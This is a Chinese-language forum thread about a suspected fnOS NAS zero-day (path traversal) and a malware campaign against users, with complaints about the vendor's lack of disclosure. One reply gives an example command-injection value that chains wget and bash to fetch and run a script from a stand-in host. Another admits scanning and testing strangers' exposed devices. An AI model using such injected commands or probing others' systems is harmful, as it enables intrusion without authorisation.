飞牛 OS 疑似 0day 漏洞,许多用户设备遭到攻击,请尽快检查设备或暂停使用

1 月 31 日
 izToDo
起因:
在近期使用飞牛时,发现会时不时的出现设备卡死、网络报错的情况,因为每天我都会通过飞牛去跑数据同步,所以没有关心这个问题,只以为是数据太多导致 FNOS 出现的什么莫名奇妙 Bug 。

直到本周周五,我又出现了这个问题,于是就想去查询一下是什么起因。
没想到,不查不知道,一查吓一跳,社区中许多人都出现了设备连接数异常、导致断网或无法连接飞牛服务器的情况。

再一搜索,这居然是一个很普遍的问题!社区中有人已经分析出这是一个专门针对 FNOS 的恶意程序,即便我已经开启了 SSL 、2FA ,且密码为非弱密码的情况下,这个恶意程序仍然植入到了我的设备。

根据一些大佬分析,飞牛疑似存在的 0day (路径穿越漏洞)可以在未授权的情况下可以访问整个 NAS 全部文件,包括系统的配置文件,这可能也是导致如上安全措施归零的主因之一。

这种 T0 级别的重大问题居然被官方一句 “别走 http 明文方式访问设备” 一笔带过,没有任何安全预警。像我一样的普通用户如果不是注意到近期的设备异常,甚至根本不知道有这么一回事。



这么大的一个技术团队,在出现这么大的安全事件后没有任何官方公告是什么用意?能不能有一个正面的态度???


附一些官方社群的分析:
https://club.fnnas.com/forum.php?mod=viewthread&tid=53230
https://club.fnnas.com/forum.php?mod=viewthread&tid=52580
16267 次点击
所在节点    信息安全
120 条回复
a9htdkbv
1 月 31 日
确实有 0day ,一个路径穿越漏洞,社区里面有说。可以访问整个 nas 全部文件,包括用户存储、敏感配置文件,好像 1.1.15 版本修复了。
a9htdkbv
1 月 31 日
我去 fofa 随手搜了几个飞牛的系统,测试了一下都是存在漏洞的(就测试了一下,没有做其他任何操作,没有影响他们的系统安全)
我猜这次攻击可能是下载系统内的密钥,然后通过密钥登陆到系统安装恶意软件的
izToDo
1 月 31 日
@a9htdkbv #2 应该是的,被入侵后恶意程序会杀掉飞牛的更新进程并修改 DNS ,阻止用户获取更新包。所以如果官方没有发公告,用户很难感知到出了问题。如果不是这一次攻击者导致整个设备出现异常,而是驻留在设备,真的很难被察觉。
a9htdkbv
1 月 31 日
还好我都是用 openvpn 回家,然后通过内网地址访问的,暂时没受到影响
经此一劫,我把 FN Connect 都关了,免得通过官方穿透被黑

其实社区 7 天前就有人反馈过这个漏洞,但是官方轻描淡写的一句“感谢,已修复”。这种核弹级的漏洞理应通过各种渠道通知用户的,比如当年的宝塔 888pma 漏洞通过短信群督促用户升级和前阵子的 react 漏洞全部群发邮件警告。隐瞒这种漏洞明显是官方对用户数据安全的不负责任,更何况已经出现了在野利用影响到了大批量用户
izToDo
1 月 31 日
@a9htdkbv #4 是的,我非常气愤的一点就在这里。哪怕官方发个邮件,发个公告,主动道歉承认问题,提醒用户及时修复,我甚至都不会发这个帖子。
一个张口闭口说创始团队是 “NAS 超级发烧友”,把 “安全稳定 NAS 系统” 作为公司生存之本的企业最终就干出这挡子事来。看到隔壁有个感谢 FNOS 团队的帖子就感到更讽刺了,熬夜加班帮用户杀毒都不想着发个声明,全部冷处理,直接对这种企业拉黑。
yuPD97Yeed4QM245
1 月 31 日
国产爱用多用
pingdog
1 月 31 日
@izToDo 捂着捂着这也算是一种特色了。。经历多几个这种事情就惯了。。你就会对中国自主品牌死心了。

btw 自己也是写代码,在这些环境下,绝大多数都是混口饭吃,上面不断搞 KPI ,下面就能跑就行
MiKing233
1 月 31 日
@a9htdkbv 可以访问整个 nas 全部文件, 这个说法有依据吗? 如果是真的无疑是对飞牛用户信任的毁灭性打击, 各个帖子看的云里雾里, 官方也轻描淡写的把锅甩给用户 http 公网访问被劫持, 如果确实是系统漏洞应该无关 http, 套了 tls 也没意义, 按我目前的理解官方是随手找了个口径背锅, 然后偷偷修复漏洞当作无事发生? 如果真是这样不负责任没有官方通报以后谁还敢用?
izToDo
1 月 31 日
@MiKing233 飞牛官方社区里面最近都是一样的问题,目测 0day 应该是跑不掉了。就是具体的漏洞类型我现在没有确认,只是有一些帖子和技术群里面有提到,这块还有待确认。
但是恶意程序确实已经下到设备内,在我的设备中已经验证了。在内核里面加了模块,清掉了日志,对被篡改的文件加了文件保护,到这一步基本已经算沦陷了,数据已经不安全了。
MiKing233
1 月 31 日
@izToDo 那确实是, 能到这一步基本算是彻底沦陷了, 好在我一开始就不信任它, 作为一台 VM 跑在 PVE 上里面没有存任何数据, 就用飞牛影视和下载挂了几个 BT 种子, 电影资源都是存在 UniFi 的 UNAS 上通过 SMB 只读挂在 fnOS 上, 那些真把飞牛当 NAS 用存个人数据的惨了...官方糊弄事的态度也是, 在另一个帖子上 www.v2ex.com/t/1189392 看到这个我还纳闷这年头怎么还有中间人攻击, 原来是给自身漏洞找个背锅侠...
YsHaNg
1 月 31 日
内核构建源码都没拿出来 gpl 一概不理的东西
billccn
1 月 31 日
@pingdog 非常有同感。

让我想到了十几年前在国内实习,保密局派人来宣讲,被叫去凑数。人家讲的典型问题各个听上去都很低级,但是直到今天偶尔还能听说。

政府领域尚且如此,不要说个人信息的保护了。什么《个人信息保护法》的存在感远不如领导的看法。

同样的事情在欧洲 24 小时之内要报告,要不然罚款全球营业额 30%,公司领导刑事责任还另算。
coolcoffee
1 月 31 日
用户群大了有攻击价值,自然就会有苍蝇找缝。如果注意一下每次群晖的更新公告,会发现也在修复各种 CVE 漏洞。

不要奢望有百分百安全的系统,Windows 和 macOS 的远程桌面敢暴露在公网被打成筛子也只是时间问题。

正确的做法还是用 Tailscale 来加密流量,减少被公网爬虫扫描的风险。
verygood
1 月 31 日
有好几个提到了用的 1.1.15 依然被感染,重装系统仍然会中木马,推测此问题没找到根因,最新版本依然没被修复
nightlight9
1 月 31 日
公开通知岂不是打了自己标榜“安全”的脸

没办法,要吃饭的嘛
sn0wdr1am
1 月 31 日
公网使用飞牛 nas 的一些安全使用小提示--感谢飞牛官方团队
https://www.v2ex.com/t/1189392#reply49

看起来讨论的就是这个。
trn4
1 月 31 日
为什么要暴露端口到公网上???
pingdog
1 月 31 日
@sn0wdr1am 看到 /t/1189392#r_17272286 贴的图,图中的用户 xwmz1369 披露了关键日志,可以看到日志记录到 docker 相关的命令出错,exit code 125 ,玩过 docker 估计都遇到过这个 exit code 。。随即 wget 下载脚本,然后看到脚本提示—-validate not found ,说明用户的输入拼接在 dockermgr hardcode 的命令的—-validate 之前

个人推测 dockermgr 存在设计缺陷,无过滤就拼接了用户的输入合并成命令并执行,例如用户输入 abc ; wget http://example.com ; bash example.sh —-validate 。符合日志的输出

web api 是否有问题,不评价,未见到有人分享 http logs
pingdog
1 月 31 日
@pingdog typo
例如用户输入 abc ; wget http://example.com ; bash example.sh

拼接后
... abc ; wget http://example.com ; bash example.sh —-validate ...
SenLief
1 月 31 日
nas 我都没敢暴露公网上,一直都是 openvpn 或者 ss 回去的。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/1189672

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX